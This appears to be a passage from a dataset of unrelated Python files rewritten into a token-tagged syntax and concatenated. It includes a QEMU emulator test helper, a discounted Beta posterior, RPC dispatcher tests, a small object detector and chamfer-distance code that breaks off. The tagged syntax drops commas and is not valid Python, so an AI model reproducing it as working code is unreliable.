state."<block_end><block_end>
<import_stmt>pexpect<import_stmt>infra<class_stmt>Emulator(object)<block_start><def_stmt>__init__ self builddir downloaddir logtofile timeout_multiplier<block_start>self.qemu=<none><line_sep>self.downloaddir=downloaddir<line_sep>self.logfile=infra.open_log_file(builddir "run" logtofile)<line_sep># We use elastic runners on the cloud to runs our tests. Those runners # can take a long time to run the emulator. Use a timeout multiplier # when running the tests to avoid sporadic failures. self.timeout_multiplier=timeout_multiplier<block_end># Start Qemu to boot the system # # arch: Qemu architecture to use # # kernel: path to the kernel image, or the special string # 'builtin'. 'builtin' means a pre-built kernel image will be # downloaded from ARTEFACTS_URL and suitable options are # automatically passed to qemu and added to the kernel cmdline. So # far only armv5, armv7 and i386 builtin kernels are available. # If None, then no kernel is used, and we assume a bootable device # will be specified. # # kernel_cmdline: array of kernel arguments to pass to Qemu -append option # # options: array of command line options to pass to Qemu # <def_stmt>boot self arch kernel=<none> kernel_cmdline=<none> options=<none><block_start><if_stmt>arch<in>["armv7" "armv5"]<block_start>qemu_arch="arm"<block_end><else_stmt><block_start>qemu_arch=arch<block_end>qemu_cmd=["qemu-system-{}".format(qemu_arch) "-serial" "stdio" "-display" "none"]<if_stmt>options<block_start>qemu_cmd<augadd>options<block_end><if_stmt>kernel_cmdline<is><none><block_start>kernel_cmdline=[]<block_end><if_stmt>kernel<block_start><if_stmt>kernel<eq>"builtin"<block_start><if_stmt>arch<in>["armv7" "armv5"]<block_start>kernel_cmdline.append("console=ttyAMA0")<block_end><if_stmt>arch<eq>"armv7"<block_start>kernel=infra.download(self.downloaddir "kernel-vexpress")<line_sep>dtb=infra.download(self.downloaddir "vexpress-v2p-ca9.dtb")<line_sep>qemu_cmd<augadd>["-dtb" dtb]<line_sep>qemu_cmd<augadd>["-M" "vexpress-a9"]<block_end><elif_stmt>arch<eq>"armv5"<block_start>kernel=infra.download(self.downloaddir "kernel-versatile")<line_sep>qemu_cmd<augadd>["-M" "versatilepb"]<block_end><block_end>qemu_cmd<augadd>["-kernel" kernel]<block_end><if_stmt>kernel_cmdline<block_start>qemu_cmd<augadd>["-append" " ".join(kernel_cmdline)]<block_end>self.logfile.write("> starting qemu with '%s'\n"%" ".join(qemu_cmd))<line_sep>self.qemu=pexpect.spawn(qemu_cmd[0] qemu_cmd[1:] timeout=5<times>self.timeout_multiplier env={"QEMU_AUDIO_DRV":"none"})<line_sep># We want only stdout into the log to avoid double echo self.qemu.logfile_read=self.logfile<block_end># Wait for the login prompt to appear, and then login as root with # the provided password, or no password if not specified. 
<def_stmt>login self password=<none># The login prompt can take some time to appear when running multiple # instances in parallel, so set the timeout to a large value <block_start>index=self.qemu.expect(["buildroot login:" pexpect.TIMEOUT] timeout=60<times>self.timeout_multiplier)<if_stmt>index<ne>0<block_start>self.logfile.write("==> System does not boot")<line_sep><raise>SystemError("System does not boot")<block_end>self.qemu.sendline("root")<if_stmt>password<block_start>self.qemu.expect("Password:")<line_sep>self.qemu.sendline(password)<block_end>index=self.qemu.expect(["# " pexpect.TIMEOUT])<if_stmt>index<ne>0<block_start><raise>SystemError("Cannot login")<block_end>self.run("dmesg -n 1")<block_end># Run the given 'cmd' with a 'timeout' on the target # return a tuple (output, exit_code) <def_stmt>run self cmd timeout=-1<block_start>self.qemu.sendline(cmd)<if_stmt>timeout<ne>-1<block_start>timeout<augmul>self.timeout_multiplier<block_end>self.qemu.expect("# " timeout=timeout)<line_sep># Remove double carriage return from qemu stdout so str.splitlines() # works as expected. output=self.qemu.before.replace("\r\r" "\r").splitlines()[1:]<line_sep>self.qemu.sendline("echo $?")<line_sep>self.qemu.expect("# ")<line_sep>exit_code=self.qemu.before.splitlines()[2]<line_sep>exit_code=int(exit_code)<line_sep><return>output exit_code<block_end><def_stmt>stop self<block_start><if_stmt>self.qemu<is><none><block_start><return><block_end>self.qemu.terminate(force=<true>)<block_end><block_end>
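# Hypothetical usage sketch (every argument below is a placeholder; a real run needs the buildroot test infra, a qemu binary and a bootable rootfs image wired in via options/kernel_cmdline): the intended call sequence is boot, login, run, stop. <if_stmt>__name__<eq>'__main__'<block_start>emu=Emulator("output/build" "dl" logtofile=<true> timeout_multiplier=1)<line_sep>emu.boot("armv5" kernel="builtin" kernel_cmdline=["root=/dev/mmcblk0"] options=["-drive" "file=rootfs.ext2,if=sd,format=raw"])<line_sep>emu.login()<line_sep>output,exit_code=emu.run("uname -m")<line_sep>print(output exit_code)<line_sep>emu.stop()<block_end>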
# -*- coding: utf-8 -*- r""" Manipulate posteriors of Bernoulli/Beta experiments., for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`). """<import_from_future_stmt> division print_function# Python 2 compatibility __author__="<NAME>"<line_sep>__version__="0.9"<line_sep># Local imports <try_stmt><block_start><import_from_stmt>.Beta Beta bernoulliBinarization<import_from_stmt>.with_proba with_proba<block_end><except_stmt>(ImportError SystemError)<block_start><import_from_stmt>Beta Beta bernoulliBinarization<import_from_stmt>with_proba with_proba<block_end><try_stmt><block_start><import_from_stmt>numpy.random beta<as>betavariate# Faster! Yes! <block_end><except_stmt>ImportError<block_start><import_from_stmt>random betavariate<block_end><import_from_stmt>scipy.special btdtri<line_sep># --- Constants #: Default value for the discount factor :math:`\gamma\in(0,1)`. #: ``0.95`` is empirically a reasonable value for short-term non-stationary experiments. GAMMA=0.95<line_sep># --- Class <class_stmt>DiscountedBeta(Beta)<block_start>r""" Manipulate posteriors of Bernoulli/Beta experiments, for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`). - It keeps :math:`\tilde{S}(t)` and :math:`\tilde{F}(t)` the *discounted* counts of successes and failures (S and F). """<def_stmt>__init__ self gamma=GAMMA a=1 b=1<block_start>r""" Create a Beta posterior :math:`\mathrm{Beta}(\alpha, \beta)` with no observation, i.e., :math:`\alpha = 1` and :math:`\beta = 1` by default."""<assert_stmt>a<ge>0 "Error: parameter 'a' for Beta posterior has to be >= 0."# DEBUG self._a=a<assert_stmt>b<ge>0 "Error: parameter 'b' for Beta posterior has to be >= 0."# DEBUG self._b=b<line_sep>self.N=[0 0]#: List of two parameters [a, b] <assert_stmt>0<l>gamma<le>1 "Error: for a DiscountedBayesianIndexPolicy policy, the discount factor has to be in (0,1], but it was {}.".format(gamma)# DEBUG <if_stmt>gamma<eq>1<block_start>print("Warning: gamma = 1 is stupid, just use a regular Beta posterior!")# DEBUG <block_end>self.gamma=gamma<block_end>#: Discount factor :math:`\gamma\in(0,1)`. <def_stmt>__str__ self<block_start><return>r"DiscountedBeta(\alpha={:.3g}, \beta={:.3g})".format(self.N[1] self.N[0])<block_end><def_stmt>reset self a=<none> b=<none><block_start>"""Reset alpha and beta, both to 0 as when creating a new default DiscountedBeta."""<if_stmt>a<is><none><block_start>a=self._a<block_end><if_stmt>b<is><none><block_start>b=self._b<block_end>self.N=[0 0]<block_end><def_stmt>sample self<block_start>"""Get a random sample from the DiscountedBeta posterior (using :func:`numpy.random.betavariate`). - Used only by :class:`Thompson` Sampling and :class:`AdBandits` so far. """<line_sep><return>betavariate(self._a+self.N[1] self._b+self.N[0])<block_end><def_stmt>quantile self p<block_start>"""Return the p quantile of the DiscountedBeta posterior (using :func:`scipy.stats.btdtri`). - Used only by :class:`BayesUCB` and :class:`AdBandits` so far. """<line_sep><return>btdtri(self._a+self.N[1] self._b+self.N[0] p)<line_sep># Bug: do not call btdtri with (0.5,0.5,0.5) in scipy version < 0.9 (old) <block_end><def_stmt>forget self obs<block_start>"""Forget the last observation, and undiscount the count of observations."""<line_sep># print("Info: calling DiscountedBeta.forget() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG # FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}... 
binaryObs=bernoulliBinarization(obs)<line_sep>self.N[binaryObs]=(self.N[binaryObs]-1)/self.gamma<line_sep>otherObs=1-binaryObs<line_sep>self.N[otherObs]=self.N[otherObs]/self.gamma<block_end><def_stmt>update self obs<block_start>r""" Add an observation, and discount the previous observations. - If obs is 1, update :math:`\alpha` the count of positive observations, - If it is 0, update :math:`\beta` the count of negative observations. - But instead of using :math:`\tilde{S}(t) = S(t)` and :math:`\tilde{N}(t) = N(t)`, they are updated at each time step using the discount factor :math:`\gamma`: .. math:: \tilde{S}(t+1) &= \gamma \tilde{S}(t) + r(t), \tilde{F}(t+1) &= \gamma \tilde{F}(t) + (1 - r(t)). .. note:: Otherwise, a trick with :func:`bernoulliBinarization` has to be used. """<line_sep># print("Info: calling DiscountedBeta.update() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG # FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}... binaryObs=bernoulliBinarization(obs)<line_sep>self.N[binaryObs]=self.gamma<times>self.N[binaryObs]+1<line_sep>otherObs=1-binaryObs<line_sep>self.N[otherObs]=self.gamma<times>self.N[otherObs]<block_end><def_stmt>discount self<block_start>r""" Simply discount the old observation, when no observation is given at this time. .. math:: \tilde{S}(t+1) &= \gamma \tilde{S}(t), \tilde{F}(t+1) &= \gamma \tilde{F}(t). """<line_sep># print("Info: calling DiscountedBeta.discount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG self.N[0]=max(0 self.gamma<times>self.N[0])<line_sep>self.N[1]=max(0 self.gamma<times>self.N[1])<block_end><def_stmt>undiscount self<block_start>r""" Simply cancel the discount on the old observation, when no observation is given at this time. .. math:: \tilde{S}(t+1) &= \frac{1}{\gamma} \tilde{S}(t), \tilde{F}(t+1) &= \frac{1}{\gamma} \tilde{F}(t). """<line_sep># print("Info: calling DiscountedBeta.undiscount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG self.N[0]=max(0 self.N[0]/self.gamma)<line_sep>self.N[1]=max(0 self.N[1]/self.gamma)<block_end><block_end>
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. <import_stmt>socket<import_from_stmt>maro.communication Proxy<def_stmt>get_random_port <block_start><with_stmt>socket.socket(socket.AF_INET socket.SOCK_STREAM)<as>temp_socket<block_start>temp_socket.bind(("" 0))<line_sep>random_port=temp_socket.getsockname()[1]<block_end><return>random_port<block_end><def_stmt>proxy_generator component_type redis_port<block_start>proxy_parameters={"group_name":"communication_unit_test" "redis_address":("localhost" redis_port) "log_enable":<false>}<line_sep>component_type_expected_peers_map={"receiver":{"sender":1} "sender":{"receiver":1} "master":{"worker":5} "worker":{"master":1}}<line_sep>proxy=Proxy(component_type=component_type expected_peers=component_type_expected_peers_map[component_type] **proxy_parameters)<line_sep><return>proxy<block_end>
<import_from_stmt>typing List<import_from_stmt>pydantic BaseModel<class_stmt>Data(BaseModel)<block_start>data:List[List[float]]=[[5.1 3.5 1.4 0.2]]<block_end>
# Copyright 2013 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>testscenarios<import_stmt>time<import_stmt>oslo_messaging<import_from_stmt>oslo_messaging rpc<import_from_stmt>oslo_messaging serializer<as>msg_serializer<import_from_stmt>oslo_messaging.tests utils<as>test_utils<import_from_stmt>unittest mock<line_sep>load_tests=testscenarios.load_tests_apply_scenarios<class_stmt>_FakeEndpoint(object)<block_start><def_stmt>__init__ self target=<none><block_start>self.target=target<block_end><def_stmt>foo self ctxt **kwargs<block_start><pass><block_end>@rpc.expose<def_stmt>bar self ctxt **kwargs<block_start><pass><block_end><def_stmt>_foobar self ctxt **kwargs<block_start><pass><block_end><block_end><class_stmt>TestDispatcher(test_utils.BaseTestCase)<block_start>scenarios=[('no_endpoints' dict(endpoints=[] access_policy=<none> dispatch_to=<none> ctxt={} msg=dict(method='foo') exposed_methods=['foo' 'bar' '_foobar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('default_target' dict(endpoints=[{}] access_policy=<none> dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo') exposed_methods=['foo' 'bar' '_foobar'] success=<true> ex=<none>)) ('default_target_ctxt_and_args' dict(endpoints=[{}] access_policy=oslo_messaging.LegacyRPCAccessPolicy dispatch_to=dict(endpoint=0 method='bar') ctxt=dict(user='bob') msg=dict(method='bar' args=dict(blaa=<true>)) exposed_methods=['foo' 'bar' '_foobar'] success=<true> ex=<none>)) ('default_target_namespace' dict(endpoints=[{}] access_policy=oslo_messaging.LegacyRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace=<none>) exposed_methods=['foo' 'bar' '_foobar'] success=<true> ex=<none>)) ('default_target_version' dict(endpoints=[{}] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' version='1.0') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('default_target_no_such_method' dict(endpoints=[{}] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foobar') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.NoSuchMethod)) ('namespace' dict(endpoints=[{} dict(namespace='testns')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=1 method='foo') ctxt={} msg=dict(method='foo' namespace='testns') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('namespace_mismatch' dict(endpoints=[{} dict(namespace='testns')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foo' namespace='nstest') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('version' dict(endpoints=[dict(version='1.5') dict(version='3.4')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=1 method='foo') ctxt={} msg=dict(method='foo' version='3.2') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('version_mismatch' 
dict(endpoints=[dict(version='1.5') dict(version='3.0')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foo' version='3.2') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('message_in_null_namespace_with_multiple_namespaces' dict(endpoints=[dict(namespace='testns' legacy_namespaces=[<none>])] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace=<none>) exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('message_in_wrong_namespace_with_multiple_namespaces' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>])] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foo' namespace='wrong') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('message_with_endpoint_no_private_and_public_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>])] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace='testns') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('message_with_endpoint_no_private_and_private_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>] )] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='_foobar') ctxt={} msg=dict(method='_foobar' namespace='testns') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.NoSuchMethod)) ('message_with_endpoint_explicitly_exposed_without_exposed_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>] )] access_policy=oslo_messaging.ExplicitRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace='testns') exposed_methods=['bar'] success=<false> ex=oslo_messaging.NoSuchMethod)) ('message_with_endpoint_explicitly_exposed_with_exposed_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>] )] access_policy=oslo_messaging.ExplicitRPCAccessPolicy dispatch_to=dict(endpoint=0 method='bar') ctxt={} msg=dict(method='bar' namespace='testns') exposed_methods=['bar'] success=<true> ex=<none>)) ]<def_stmt>test_dispatcher self<block_start><def_stmt>_set_endpoint_mock_properties endpoint<block_start>endpoint.foo=mock.Mock(spec=dir(_FakeEndpoint.foo))<line_sep># mock doesn't pick up the decorated method. 
endpoint.bar=mock.Mock(spec=dir(_FakeEndpoint.bar))<line_sep>endpoint.bar.exposed=mock.PropertyMock(return_value=<true>)<line_sep>endpoint._foobar=mock.Mock(spec=dir(_FakeEndpoint._foobar))<line_sep><return>endpoint<block_end>endpoints=[_set_endpoint_mock_properties(mock.Mock(spec=_FakeEndpoint target=oslo_messaging.Target(**e)))<for>e self.endpoints]<line_sep>serializer=<none><line_sep>dispatcher=oslo_messaging.RPCDispatcher(endpoints serializer self.access_policy)<line_sep>incoming=mock.Mock(ctxt=self.ctxt message=self.msg client_timeout=0)<line_sep>res=<none><try_stmt><block_start>res=dispatcher.dispatch(incoming)<block_end><except_stmt>Exception<as>ex<block_start>self.assertFalse(self.success ex)<line_sep>self.assertIsNotNone(self.ex ex)<line_sep>self.assertIsInstance(ex self.ex ex)<if_stmt>isinstance(ex oslo_messaging.NoSuchMethod)<block_start>self.assertEqual(self.msg.get('method') ex.method)<block_end><elif_stmt>isinstance(ex oslo_messaging.UnsupportedVersion)<block_start>self.assertEqual(self.msg.get('version' '1.0') ex.version)<if_stmt>ex.method<block_start>self.assertEqual(self.msg.get('method') ex.method)<block_end><block_end><block_end><else_stmt><block_start>self.assertTrue(self.success "Unexpected success of operation during testing")<line_sep>self.assertIsNotNone(res)<block_end><for_stmt>n,endpoint enumerate(endpoints)<block_start><for_stmt>method_name self.exposed_methods<block_start>method=getattr(endpoint method_name)<if_stmt>self.dispatch_to<and>n<eq>self.dispatch_to['endpoint']<and>method_name<eq>self.dispatch_to['method']<and>method_name<in>self.exposed_methods<block_start>method.assert_called_once_with(self.ctxt **self.msg.get('args' {}))<block_end><else_stmt><block_start>self.assertEqual(0 method.call_count 'method: {}'.format(method))<block_end><block_end><block_end><block_end><block_end><class_stmt>TestDispatcherWithPingEndpoint(test_utils.BaseTestCase)<block_start><def_stmt>test_dispatcher_with_ping self<block_start>self.config(rpc_ping_enabled=<true>)<line_sep>dispatcher=oslo_messaging.RPCDispatcher([] <none> <none>)<line_sep>incoming=mock.Mock(ctxt={} message=dict(method='oslo_rpc_server_ping') client_timeout=0)<line_sep>res=dispatcher.dispatch(incoming)<line_sep>self.assertEqual('pong' res)<block_end><def_stmt>test_dispatcher_with_ping_already_used self<block_start><class_stmt>MockEndpoint(object)<block_start><def_stmt>oslo_rpc_server_ping self ctxt **kwargs<block_start><return>'not_pong'<block_end><block_end>mockEndpoint=MockEndpoint()<line_sep>self.config(rpc_ping_enabled=<true>)<line_sep>dispatcher=oslo_messaging.RPCDispatcher([mockEndpoint] <none> <none>)<line_sep>incoming=mock.Mock(ctxt={} message=dict(method='oslo_rpc_server_ping') client_timeout=0)<line_sep>res=dispatcher.dispatch(incoming)<line_sep>self.assertEqual('not_pong' res)<block_end><block_end><class_stmt>TestSerializer(test_utils.BaseTestCase)<block_start>scenarios=[('no_args_or_retval' dict(ctxt={} dctxt={} args={} retval=<none>)) ('args_and_retval' dict(ctxt=dict(user='bob') dctxt=dict(user='alice') args=dict(a='a' b='b' c='c') retval='d')) ]<def_stmt>test_serializer self<block_start>endpoint=_FakeEndpoint()<line_sep>serializer=msg_serializer.NoOpSerializer()<line_sep>dispatcher=oslo_messaging.RPCDispatcher([endpoint] serializer)<line_sep>endpoint.foo=mock.Mock()<line_sep>args=dict([(k 'd'+v)<for>k,v 
self.args.items()])<line_sep>endpoint.foo.return_value=self.retval<line_sep>serializer.serialize_entity=mock.Mock()<line_sep>serializer.deserialize_entity=mock.Mock()<line_sep>serializer.deserialize_context=mock.Mock()<line_sep>serializer.deserialize_context.return_value=self.dctxt<line_sep>expected_side_effect=['d'+arg<for>arg self.args]<line_sep>serializer.deserialize_entity.side_effect=expected_side_effect<line_sep>serializer.serialize_entity.return_value=<none><if_stmt>self.retval<block_start>serializer.serialize_entity.return_value='s'+self.retval<block_end>incoming=mock.Mock()<line_sep>incoming.ctxt=self.ctxt<line_sep>incoming.message=dict(method='foo' args=self.args)<line_sep>incoming.client_timeout=0<line_sep>retval=dispatcher.dispatch(incoming)<if_stmt>self.retval<is><not><none><block_start>self.assertEqual('s'+self.retval retval)<block_end>endpoint.foo.assert_called_once_with(self.dctxt **args)<line_sep>serializer.deserialize_context.assert_called_once_with(self.ctxt)<line_sep>expected_calls=[mock.call(self.dctxt arg)<for>arg self.args]<line_sep>self.assertEqual(expected_calls serializer.deserialize_entity.mock_calls)<line_sep>serializer.serialize_entity.assert_called_once_with(self.dctxt self.retval)<block_end><block_end><class_stmt>TestMonitorFailure(test_utils.BaseTestCase)<block_start>"""Test what happens when the call monitor watchdog hits an exception when sending the heartbeat. """<class_stmt>_SleepyEndpoint(object)<block_start><def_stmt>__init__ self target=<none><block_start>self.target=target<block_end><def_stmt>sleep self ctxt **kwargs<block_start>time.sleep(kwargs['timeout'])<line_sep><return><true><block_end><block_end><def_stmt>test_heartbeat_failure self<block_start>endpoints=[self._SleepyEndpoint()]<line_sep>dispatcher=oslo_messaging.RPCDispatcher(endpoints serializer=<none>)<line_sep># sleep long enough for the client_timeout to expire multiple times # the timeout is (client_timeout/2) and must be > 1.0 message={'method':'sleep' 'args':{'timeout':3.5}}<line_sep>ctxt={'test':'value'}<line_sep>incoming=mock.Mock(ctxt=ctxt message=message client_timeout=2.0)<line_sep>incoming.heartbeat=mock.Mock(side_effect=Exception('BOOM!'))<line_sep>res=dispatcher.dispatch(incoming)<line_sep>self.assertTrue(res)<line_sep># only one call to heartbeat should be made since the watchdog thread # should exit on the first exception thrown self.assertEqual(1 incoming.heartbeat.call_count)<block_end><block_end>
<import_from_stmt>distutils.core setup<line_sep>setup(name='frozendict' version='0.3' url='https://github.com/slezica/python-frozendict' author='<NAME>' author_email='<EMAIL>' packages=['frozendict'] license='MIT License' description='An immutable dictionary' long_description=open('README.txt').read())<line_sep>
""" Loop. The loop() function causes draw() to execute repeatedly. If noLoop is called in setup() the draw() is only executed once. In this example click the mouse to execute loop(), which will cause the draw() to execute repeatedly. """<line_sep>y=100<def_stmt>setup <block_start>""" The statements in the setup() function run once when the program begins. """<line_sep>size(640 360)# Size should be the first statement stroke(255)# Set stroke color to white noLoop()<line_sep>y=height<times>0.5<block_end><def_stmt>draw <block_start>""" The statements in draw() are run until the program is stopped. Each statement is run in sequence and after the last line is read, the first line is run again. """<line_sep><global>y<line_sep>background(0)# Set the background to black line(0 y width y)<line_sep>y=y-1<if_stmt>y<l>0<block_start>y=height<block_end><block_end><def_stmt>mousePressed <block_start>loop()<block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>model.fpn *<import_from_stmt>model.backbone.shufflenetv2 *<class_stmt>Detector(nn.Module)<block_start><def_stmt>__init__ self classes anchor_num load_param<block_start>super(Detector self).__init__()<line_sep>out_depth=112<line_sep>stage_out_channels=[-1 24 48 96 192]<line_sep>self.backbone=ShuffleNetV2(stage_out_channels load_param)<line_sep>self.fpn=LightFPN(stage_out_channels[-2]+stage_out_channels[-1] stage_out_channels[-1] out_depth)<line_sep>self.output_layers=nn.Conv2d(out_depth (5+classes)<times>3 1 1 0 bias=<true>)<block_end><def_stmt>forward self x<block_start>C2,C3=self.backbone(x)<line_sep>P2,P3=self.fpn(C2 C3)<line_sep>out_2=self.output_layers(P2)<line_sep>out_3=self.output_layers(P3)<line_sep><return>out_2 out_3<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>model=Detector(80 3)<line_sep>test_data=torch.rand(1 3 320 320)<line_sep>torch.onnx.export(model #model being run test_data # model input (or a tuple for multiple inputs) "test.onnx" # where to save the model (can be a file or file-like object) export_params=<true> # store the trained parameter weights inside the model file opset_version=11 # the ONNX version to export the model to do_constant_folding=<true>)<block_end># whether to execute constant folding for optimization
<import_stmt>os<import_stmt>unittest<import_stmt>yaml<import_from_stmt>aws_lambda.helpers read<class_stmt>TestReadHelper(unittest.TestCase)<block_start>TEST_FILE="readTmp.txt"<def_stmt>setUp self<block_start><with_stmt>open(TestReadHelper.TEST_FILE "w")<as>tmp_file<block_start>tmp_file.write("testYaml: testing")<block_end><block_end><def_stmt>tearDown self<block_start>os.remove(TestReadHelper.TEST_FILE)<block_end><def_stmt>test_read_no_loader_non_binary self<block_start>fileContents=read(TestReadHelper.TEST_FILE)<line_sep>self.assertEqual(fileContents "testYaml: testing")<block_end><def_stmt>test_read_yaml_loader_non_binary self<block_start>testYaml=read(TestReadHelper.TEST_FILE loader=yaml.full_load)<line_sep>self.assertEqual(testYaml["testYaml"] "testing")<block_end><def_stmt>test_read_no_loader_binary_mode self<block_start>fileContents=read(TestReadHelper.TEST_FILE binary_file=<true>)<line_sep>self.assertEqual(fileContents b"testYaml: testing")<block_end><def_stmt>test_read_yaml_loader_binary_mode self<block_start>testYaml=read(TestReadHelper.TEST_FILE loader=yaml.full_load binary_file=<true>)<line_sep>self.assertEqual(testYaml["testYaml"] "testing")<block_end><block_end>
<import_stmt>unittest<import_stmt>os<import_stmt>tempfile<import_stmt>uuid<import_from_stmt>studio model<import_from_stmt>model_test get_test_experiment<line_sep># We are not currently working with HTTP providers. @unittest.skip<class_stmt>HTTPProviderHostedTest(unittest.TestCase)<block_start><def_stmt>get_db_provider self config_name<block_start>config_file=os.path.join(os.path.dirname(os.path.realpath(__file__)) config_name)<line_sep><return>model.get_db_provider(model.get_config(config_file))<block_end><def_stmt>test_add_get_delete_experiment self<block_start><with_stmt>self.get_db_provider('test_config_http_client.yaml')<as>hp<block_start>experiment_tuple=get_test_experiment()<line_sep>hp.add_experiment(experiment_tuple[0])<line_sep>experiment=hp.get_experiment(experiment_tuple[0].key)<line_sep>self.assertEquals(experiment.key experiment_tuple[0].key)<line_sep>self.assertEquals(experiment.filename experiment_tuple[0].filename)<line_sep>self.assertEquals(experiment.args experiment_tuple[0].args)<line_sep>hp.delete_experiment(experiment_tuple[1])<line_sep>self.assertTrue(hp.get_experiment(experiment_tuple[1])<is><none>)<block_end><block_end><def_stmt>test_start_experiment self<block_start><with_stmt>self.get_db_provider('test_config_http_client.yaml')<as>hp<block_start>experiment_tuple=get_test_experiment()<line_sep>hp.add_experiment(experiment_tuple[0])<line_sep>hp.start_experiment(experiment_tuple[0])<line_sep>experiment=hp.get_experiment(experiment_tuple[1])<line_sep>self.assertTrue(experiment.status<eq>'running')<line_sep>self.assertEquals(experiment.key experiment_tuple[0].key)<line_sep>self.assertEquals(experiment.filename experiment_tuple[0].filename)<line_sep>self.assertEquals(experiment.args experiment_tuple[0].args)<line_sep>hp.finish_experiment(experiment_tuple[0])<line_sep>hp.delete_experiment(experiment_tuple[1])<block_end><block_end><def_stmt>test_add_get_experiment_artifacts self<block_start>experiment_tuple=get_test_experiment()<line_sep>e_experiment=experiment_tuple[0]<line_sep>e_artifacts=e_experiment.artifacts<line_sep>a1_filename=os.path.join(tempfile.gettempdir() str(uuid.uuid4()))<line_sep>a2_filename=os.path.join(tempfile.gettempdir() str(uuid.uuid4()))<with_stmt>open(a1_filename 'w')<as>f<block_start>f.write('hello world')<block_end>e_artifacts['a1']={'local':a1_filename 'mutable':<false>}<line_sep>e_artifacts['a2']={'local':a2_filename 'mutable':<true>}<with_stmt>self.get_db_provider('test_config_http_client.yaml')<as>db<block_start>db.add_experiment(e_experiment)<line_sep>experiment=db.get_experiment(e_experiment.key)<line_sep>self.assertEquals(experiment.key e_experiment.key)<line_sep>self.assertEquals(experiment.filename e_experiment.filename)<line_sep>self.assertEquals(experiment.args e_experiment.args)<line_sep>db.delete_experiment(e_experiment.key)<line_sep>os.remove(a1_filename)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_stmt>torch<import_stmt>dist_chamfer<as>ext<line_sep>distChamfer=ext.chamferDist()<import_from_stmt>torch.autograd Variable<def_stmt>pairwise_dist x y<block_start>xx,yy,zz=torch.mm(x x.t()) torch.mm(y y.t()) torch.mm(x y.t())<line_sep>rx=xx.diag().unsqueeze(0).expand_as(xx)<line_sep>ry=yy.diag().unsqueeze(0).expand_as(yy)<line_sep>P=rx.t()+ry-2<times>zz<line_sep><return>P<block_end><def_stmt>NN_loss x y dim=0<block_start>dist=pairwise_dist(x y)<line_sep>values,indices=dist.min(dim=dim)<line_sep><return>values.mean()<block_end><def_stmt>mydistChamfer a b<block_start>x,y=a b<line_sep>bs,num_points,points_dim=x.size()<line_sep>xx=torch.bmm(x x.transpose(2 1))<line_sep>yy=torch.bmm(y y.transpose(2 1))<line_sep>zz=torch.bmm(x y.transpose(2 1))<line_sep>diag_ind=torch.arange(0 num_points).type(torch.cuda.LongTensor)<line_sep>rx=xx[: diag_ind diag_ind].unsqueeze(1).expand_as(xx)<line_sep>ry=yy[: diag_ind diag_ind].unsqueeze(1).expand_as(yy)<line_sep>P=rx.transpose(2 1)+ry-2<times>zz<line_sep><return>torch.min(P 2)[0] torch.min(P 1)[0]<block_end><def_stmt>test_chamfer <block_start>distChamfer=ext.chamferDist()<line_sep>p1=torch.rand(4 100 3).cuda()<line_sep>p2=torch.rand(4 100 3).cuda()<line_sep>points1=Variable(p1 requires_grad=<true>)<line_sep>points2=Variable(p2)<line_sep>dist1,dist2,=distChamfer(points1 